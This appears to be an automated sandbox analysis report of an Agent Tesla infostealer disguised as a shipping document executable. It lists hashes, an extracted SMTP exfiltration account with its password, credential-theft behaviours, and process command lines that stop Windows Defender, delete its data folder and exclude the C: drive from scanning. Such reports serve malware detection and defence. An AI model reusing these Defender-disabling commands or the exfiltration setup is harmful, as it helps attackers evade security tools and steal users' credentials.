Analysis
-
max time kernel
145s -
max time network
143s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
21-04-2021 10:18
Static task
static1
Behavioral task
behavioral1
Sample
MV ATLANTIC B - PRIME EAST SHIPPING.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
MV ATLANTIC B - PRIME EAST SHIPPING.exe
Resource
win10v20210410
General
-
Target
MV ATLANTIC B - PRIME EAST SHIPPING.exe
-
Size
479KB
-
MD5
58986c24e1bdbb6a4dc734972f0c2457
-
SHA1
55efb98db1658687405482410c825e2e0645c5ae
-
SHA256
deb49f04e1fd81d2c37e7a8a234d8460c6de4cd2513dca91fc5c6ed84fdae2f1
-
SHA512
e22c6140e11cff9584a963345b77989112fd2400bd0eb8a0b055a1fdc8f90b8e0e4167c8127da34aef30232ab0cabde63cd91b468fbc4757e8d53be04536b63e
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
smtp.hyshippingcn.com - Port:
587 - Username:
plogs112@hyshippingcn.com - Password:
e*u@qkS4
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
AgentTesla Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4248-131-0x000000000043763E-mapping.dmp family_agenttesla behavioral2/memory/4248-130-0x0000000000400000-0x000000000043C000-memory.dmp family_agenttesla -
Nirsoft 5 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe Nirsoft -
Executes dropped EXE 4 IoCs
Processes:
AdvancedRun.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.exepid process 1016 AdvancedRun.exe 4004 AdvancedRun.exe 3972 AdvancedRun.exe 4148 AdvancedRun.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 21 api.ipify.org 22 api.ipify.org -
Suspicious use of SetThreadContext 1 IoCs
Processes:
MV ATLANTIC B - PRIME EAST SHIPPING.exedescription pid process target process PID 4436 set thread context of 4248 4436 MV ATLANTIC B - PRIME EAST SHIPPING.exe MV ATLANTIC B - PRIME EAST SHIPPING.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
Processes:
MV ATLANTIC B - PRIME EAST SHIPPING.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings MV ATLANTIC B - PRIME EAST SHIPPING.exe -
Suspicious behavior: EnumeratesProcesses 23 IoCs
Processes:
AdvancedRun.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.exeMV ATLANTIC B - PRIME EAST SHIPPING.exeMV ATLANTIC B - PRIME EAST SHIPPING.exepowershell.exepid process 1016 AdvancedRun.exe 1016 AdvancedRun.exe 1016 AdvancedRun.exe 1016 AdvancedRun.exe 4004 AdvancedRun.exe 4004 AdvancedRun.exe 4004 AdvancedRun.exe 4004 AdvancedRun.exe 3972 AdvancedRun.exe 3972 AdvancedRun.exe 3972 AdvancedRun.exe 3972 AdvancedRun.exe 4148 AdvancedRun.exe 4148 AdvancedRun.exe 4148 AdvancedRun.exe 4148 AdvancedRun.exe 4436 MV ATLANTIC B - PRIME EAST SHIPPING.exe 4436 MV ATLANTIC B - PRIME EAST SHIPPING.exe 4248 MV ATLANTIC B - PRIME EAST SHIPPING.exe 4248 MV ATLANTIC B - PRIME EAST SHIPPING.exe 4408 powershell.exe 4408 powershell.exe 4408 powershell.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
AdvancedRun.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.exeMV ATLANTIC B - PRIME EAST SHIPPING.exeMV ATLANTIC B - PRIME EAST SHIPPING.exepowershell.exedescription pid process Token: SeDebugPrivilege 1016 AdvancedRun.exe Token: SeImpersonatePrivilege 1016 AdvancedRun.exe Token: SeDebugPrivilege 4004 AdvancedRun.exe Token: SeImpersonatePrivilege 4004 AdvancedRun.exe Token: SeDebugPrivilege 3972 AdvancedRun.exe Token: SeImpersonatePrivilege 3972 AdvancedRun.exe Token: SeDebugPrivilege 4148 AdvancedRun.exe Token: SeImpersonatePrivilege 4148 AdvancedRun.exe Token: SeDebugPrivilege 4436 MV ATLANTIC B - PRIME EAST SHIPPING.exe Token: SeDebugPrivilege 4248 MV ATLANTIC B - PRIME EAST SHIPPING.exe Token: SeDebugPrivilege 4408 powershell.exe -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
MV ATLANTIC B - PRIME EAST SHIPPING.exeAdvancedRun.exeAdvancedRun.exeWScript.exedescription pid process target process PID 4436 wrote to memory of 1016 4436 MV ATLANTIC B - PRIME EAST SHIPPING.exe AdvancedRun.exe PID 4436 wrote to memory of 1016 4436 MV ATLANTIC B - PRIME EAST SHIPPING.exe AdvancedRun.exe PID 4436 wrote to memory of 1016 4436 MV ATLANTIC B - PRIME EAST SHIPPING.exe AdvancedRun.exe PID 1016 wrote to memory of 4004 1016 AdvancedRun.exe AdvancedRun.exe PID 1016 wrote to memory of 4004 1016 AdvancedRun.exe AdvancedRun.exe PID 1016 wrote to memory of 4004 1016 AdvancedRun.exe AdvancedRun.exe PID 4436 wrote to memory of 3972 4436 MV ATLANTIC B - PRIME EAST SHIPPING.exe AdvancedRun.exe PID 4436 wrote to memory of 3972 4436 MV ATLANTIC B - PRIME EAST SHIPPING.exe AdvancedRun.exe PID 4436 wrote to memory of 3972 4436 MV ATLANTIC B - PRIME EAST SHIPPING.exe AdvancedRun.exe PID 3972 wrote to memory of 4148 3972 AdvancedRun.exe AdvancedRun.exe PID 3972 wrote to memory of 4148 3972 AdvancedRun.exe AdvancedRun.exe PID 3972 wrote to memory of 4148 3972 AdvancedRun.exe AdvancedRun.exe PID 4436 wrote to memory of 4264 4436 MV ATLANTIC B - PRIME EAST SHIPPING.exe WScript.exe PID 4436 wrote to memory of 4264 4436 MV ATLANTIC B - PRIME EAST SHIPPING.exe WScript.exe PID 4436 wrote to memory of 4264 4436 MV ATLANTIC B - PRIME EAST SHIPPING.exe WScript.exe PID 4436 wrote to memory of 4248 4436 MV ATLANTIC B - PRIME EAST SHIPPING.exe MV ATLANTIC B - PRIME EAST SHIPPING.exe PID 4436 wrote to memory of 4248 4436 MV ATLANTIC B - PRIME EAST SHIPPING.exe MV ATLANTIC B - PRIME EAST SHIPPING.exe PID 4436 wrote to memory of 4248 4436 MV ATLANTIC B - PRIME EAST SHIPPING.exe MV ATLANTIC B - PRIME EAST SHIPPING.exe PID 4436 wrote to memory of 4248 4436 MV ATLANTIC B - PRIME EAST SHIPPING.exe MV ATLANTIC B - PRIME EAST SHIPPING.exe PID 4436 wrote to memory of 4248 4436 MV ATLANTIC B - PRIME EAST SHIPPING.exe MV ATLANTIC B - PRIME EAST SHIPPING.exe PID 4436 wrote to memory of 4248 4436 MV ATLANTIC B - PRIME EAST SHIPPING.exe MV ATLANTIC B - PRIME EAST SHIPPING.exe PID 4436 wrote to memory of 4248 4436 MV ATLANTIC B - PRIME EAST SHIPPING.exe MV ATLANTIC B - PRIME EAST SHIPPING.exe PID 4436 wrote to memory of 4248 4436 MV ATLANTIC B - PRIME EAST SHIPPING.exe MV ATLANTIC B - PRIME EAST SHIPPING.exe PID 4264 wrote to memory of 4408 4264 WScript.exe powershell.exe PID 4264 wrote to memory of 4408 4264 WScript.exe powershell.exe PID 4264 wrote to memory of 4408 4264 WScript.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\MV ATLANTIC B - PRIME EAST SHIPPING.exe"C:\Users\Admin\AppData\Local\Temp\MV ATLANTIC B - PRIME EAST SHIPPING.exe"1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /SpecialRun 4101d8 10163⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /SpecialRun 4101d8 39723⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\zZiinsgogu.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\MV ATLANTIC B - PRIME EAST SHIPPING.exe"C:\Users\Admin\AppData\Local\Temp\MV ATLANTIC B - PRIME EAST SHIPPING.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MV ATLANTIC B - PRIME EAST SHIPPING.exe.logMD5
605f809fab8c19729d39d075f7ffdb53
SHA1c546f877c9bd53563174a90312a8337fdfc5fdd9
SHA2566904d540649e76c55f99530b81be17e099184bb4cad415aa9b9b39cc3677f556
SHA51282cc12c3186ae23884b8d5c104638c8206272c4389ade56b926dfc1d437b03888159b3c790b188b54d277a262e731927e703e680ea642e1417faee27443fd5b3
-
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exeMD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exeMD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exeMD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exeMD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exeMD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
C:\Users\Admin\AppData\Local\Temp\zZiinsgogu.vbsMD5
570e1760047887d4773c02a7f0c0a9ef
SHA1ea36b58136c15c0c38ca496e5fd55e9de62073dc
SHA256c14774447472f5eec655d2046e6e4930b3bed4877de328d4f8a58416b7144db2
SHA512aeb14674534d2a4cc6d58fe733a4a6085d031f1a45ddad9e3e8fa312879b6cd8a1dff962529639b8ebea98d1ca8a9d42c0893d267696a70c7e9db696980b9ef3
-
memory/1016-119-0x0000000000000000-mapping.dmp
-
memory/3972-124-0x0000000000000000-mapping.dmp
-
memory/4004-122-0x0000000000000000-mapping.dmp
-
memory/4148-126-0x0000000000000000-mapping.dmp
-
memory/4248-137-0x0000000005600000-0x0000000005601000-memory.dmpFilesize
4KB
-
memory/4248-135-0x00000000059A0000-0x00000000059A1000-memory.dmpFilesize
4KB
-
memory/4248-198-0x0000000005451000-0x0000000005452000-memory.dmpFilesize
4KB
-
memory/4248-131-0x000000000043763E-mapping.dmp
-
memory/4248-130-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/4248-142-0x0000000005450000-0x0000000005451000-memory.dmpFilesize
4KB
-
memory/4264-128-0x0000000000000000-mapping.dmp
-
memory/4408-145-0x0000000007260000-0x0000000007261000-memory.dmpFilesize
4KB
-
memory/4408-148-0x0000000007C30000-0x0000000007C31000-memory.dmpFilesize
4KB
-
memory/4408-174-0x0000000006CA3000-0x0000000006CA4000-memory.dmpFilesize
4KB
-
memory/4408-140-0x0000000006B50000-0x0000000006B51000-memory.dmpFilesize
4KB
-
memory/4408-141-0x00000000072E0000-0x00000000072E1000-memory.dmpFilesize
4KB
-
memory/4408-173-0x000000007F270000-0x000000007F271000-memory.dmpFilesize
4KB
-
memory/4408-143-0x0000000006CA0000-0x0000000006CA1000-memory.dmpFilesize
4KB
-
memory/4408-144-0x0000000006CA2000-0x0000000006CA3000-memory.dmpFilesize
4KB
-
memory/4408-172-0x00000000095D0000-0x00000000095D1000-memory.dmpFilesize
4KB
-
memory/4408-146-0x0000000007B60000-0x0000000007B61000-memory.dmpFilesize
4KB
-
memory/4408-147-0x0000000007980000-0x0000000007981000-memory.dmpFilesize
4KB
-
memory/4408-136-0x0000000000000000-mapping.dmp
-
memory/4408-149-0x0000000007B20000-0x0000000007B21000-memory.dmpFilesize
4KB
-
memory/4408-150-0x0000000008520000-0x0000000008521000-memory.dmpFilesize
4KB
-
memory/4408-151-0x0000000008320000-0x0000000008321000-memory.dmpFilesize
4KB
-
memory/4408-159-0x00000000090C0000-0x00000000090F3000-memory.dmpFilesize
204KB
-
memory/4408-166-0x00000000090A0000-0x00000000090A1000-memory.dmpFilesize
4KB
-
memory/4408-171-0x0000000009410000-0x0000000009411000-memory.dmpFilesize
4KB
-
memory/4436-118-0x0000000002DE0000-0x0000000002DE1000-memory.dmpFilesize
4KB
-
memory/4436-116-0x00000000013E0000-0x00000000013E2000-memory.dmpFilesize
8KB
-
memory/4436-114-0x0000000000A40000-0x0000000000A41000-memory.dmpFilesize
4KB
-
memory/4436-117-0x00000000052D0000-0x0000000005312000-memory.dmpFilesize
264KB